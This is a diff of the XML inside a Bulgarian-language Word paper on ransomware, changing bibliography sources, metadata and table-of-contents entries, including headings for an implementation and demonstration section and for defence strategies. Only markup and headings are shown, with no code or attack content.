+    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
+    <b:Title>Gpcode</b:Title>
+    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
+    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
+    <b:RefOrder>8</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Car</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{B33FE28A-06AA-43AA-8331-B4CEAD781862}</b:Guid>
+    <b:Title>Social Engineering</b:Title>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>University</b:Last>
+            <b:First>Carnegie</b:First>
+            <b:Middle>Mellon</b:Middle>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:URL>https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</b:URL>
+    <b:RefOrder>9</b:RefOrder>
+  </b:Source>
+</b:Sources>
 </file>
 
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EC25E0E9-ED1E-4DED-B1D8-B99F35F6AB52}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -7861,6 +9568,32 @@
 </ds:datastoreItem>
 </file>
 
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EF2CBA0C-06DA-4F41-AA0E-A73FE5799207}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
 <file path=docMetadata/LabelInfo.xml><?xml version="1.0" encoding="utf-8"?>
 <clbl:labelList xmlns:clbl="http://schemas.microsoft.com/office/2020/mipLabelMetadata">
   <clbl:label id="{0cf7ac0a-4681-4823-ab0b-04ef02c5f873}" enabled="1" method="Standard" siteId="{42f7676c-f455-423c-82f6-dc2d99791af7}" contentBits="0" removed="0"/>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -680,7 +680,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223361337" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385505" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -708,7 +708,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361337 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385505 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -751,7 +751,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361338" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385506" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -786,7 +786,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361338 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385506 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -829,7 +829,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361339" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385507" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -864,7 +864,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361339 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385507 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -908,7 +908,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361340" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385508" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -958,7 +958,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361340 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385508 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1002,7 +1002,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361341" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385509" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1067,7 +1067,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361341 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385509 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1111,7 +1111,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361342" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385510" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1155,7 +1155,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361342 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385510 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1199,7 +1199,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361343" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385511" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1265,7 +1265,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361343 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385511 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1309,7 +1309,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361344" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385512" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1367,7 +1367,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361344 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385512 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1410,12 +1410,456 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361345" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385513" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
+              <w:t xml:space="preserve">Имплементация на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385513 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223385514" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Демонстрация на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385514 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223385515" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Съдържание на текстовите файлове преди криптирането:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385515 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223385516" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Стартиране на демото:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385516 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223385517" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Жертвата е заплатила откупа:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385517 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223385518" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>QR code</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> към имплементацията:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385518 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>17</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223385519" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
               <w:t xml:space="preserve">Стратегии и защита от </w:t>
             </w:r>
             <w:r>
@@ -1445,7 +1889,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361345 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385519 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1465,7 +1909,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1489,7 +1933,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361346" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385520" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1546,7 +1990,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361346 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385520 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1566,7 +2010,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1590,7 +2034,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361347" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385521" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1633,7 +2077,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361347 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385521 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1653,7 +2097,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>19</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1677,7 +2121,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361348" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385522" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1719,7 +2163,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361348 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385522 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1739,7 +2183,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>20</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1763,7 +2207,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361349" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385523" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1814,7 +2258,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361349 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385523 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1834,7 +2278,102 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>21</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="720"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223385524" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>5.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Други форми на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Social Engineering</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385524 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>22</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1857,7 +2396,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223361350" w:history="1">
+          <w:hyperlink w:anchor="_Toc223385525" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1884,7 +2423,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223361350 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223385525 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1904,7 +2443,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1917,6 +2456,9 @@
         </w:p>
         <w:p>
           <w:pPr>
+            <w:rPr>
+              <w:bCs/>
+            </w:rPr>
             <w:sectPr>
               <w:headerReference w:type="default" r:id="rId13"/>
               <w:footerReference w:type="default" r:id="rId14"/>
@@ -1944,7 +2486,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223361337"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223385505"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -2222,7 +2764,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223361338"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223385506"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -2471,7 +3013,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223361339"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223385507"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -2498,7 +3040,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223361340"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223385508"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -2647,6 +3189,9 @@
       </w:sdt>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -2710,80 +3255,74 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="left"/>
+        <w:pStyle w:val="Caption"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc223382607"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
